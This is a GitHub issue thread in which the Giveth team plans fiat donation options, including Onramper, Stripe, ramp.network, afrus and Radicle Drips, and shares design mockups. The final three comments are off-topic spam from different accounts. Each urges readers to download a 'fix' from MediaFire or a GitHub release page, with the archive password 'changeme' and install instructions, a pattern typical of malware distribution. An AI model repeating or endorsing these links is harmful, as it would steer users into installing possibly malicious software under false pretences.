### ISSUE TITLE
Fiat Exploration

### ISSUE THREAD

**Issue by mateodaza** [Giveth/Roadmap#38]
We are having a very very long discussion in the [forum](https://forum.giveth.io/t/the-infamous-fiat-donations-in-giveth/837), this epic will serve to keep track on all the work and implementations we'll work on during this exploration. This is a very experimental and complex feature so for now we have 2 main flows to follow, in the future we may expand:

- SDG donations pilot: Let's start receiving fiat donations as an organization, while we discover what's the best UX we may bring the option to all other projects
- Onramper Integration: Let's allow users to buy crypto directly to the project's wallet. Onramper is a great solution which keeps many on ramping solutions in one widget (Moonpay, Wyre, Xanpool, Mercuryo, Coinify, Indacoin, Utorg, Transak
 and Itez for now)

As an extra, I'm on discussion with the team of [afrus](https://afrus.app/), they help organizations to get donations on Latinamerica, they work as an app to manage donations but only on fiat but they are very interested in bringing crypto aand they love Giveth, we could piggyback on their fiat donations feature and they could use us for crypto. As soon as I have the ideas more clear and how feasible it is, we'll start planning 

UPDATE Nov 21st:
Quoting Yass from the forum post, we can add to the list a possible join with Radicle using Drips 
- with **Radicle Drips**... [through a grant] our initial ask was to integrate their Drips to stream donations to projects. They are 100% interested to try this with us but also for the Credit Card donations. It may be useful to involve them in this research and understand how we can overcome all the hurdles together; especially that we can get a grant for it too!

UPDATE DEC 2nd:
[Stripe is back](https://t.co/YNUdv6R9PE) after having shut us down a couple of years ago, let's see if this time we have a way to bring fiat back through them

UPDATE DEC 12th:
We are on discussions with [ramp.network](https://ramp.network/) to bring on the service to directly onboard users to gnosis with xDAI directly. The donation can't happen from a third party through their service but we can give this as an extra option for users to top up their wallet

**Comment by mateodaza** [comment]
@MoeNick got some amazing [designs](https://www.figma.com/file/nVoinu0tgJ565enN5R4WDE/Giveth.io-%26-GIVeconomy?node-id=15987%3A284100&t=twsrWUeDdMtnCrYK-0) from @Tosinolawale ! please provide some feedback

![image](https://user-images.githubusercontent.com/18689480/207216656-2b58083a-4319-483f-b126-8bf5fc417421.png)

![image](https://user-images.githubusercontent.com/18689480/207216687-dd27a972-d68f-4027-b245-3775abd17435.png)

![image](https://user-images.githubusercontent.com/18689480/207216714-bf9a5219-7373-4140-b32e-f80a43c6dbc9.png)

I still gotta meet with him to update these for ramp.network, not sure if the process will be here as they won't allow to make the donations directly to the projects, but we can provide this as a "top up your wallet" with some xDAI before donating

**Comment by divine-comedian** [comment]
@mateodaza can we close this one in favour of #25 ?

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
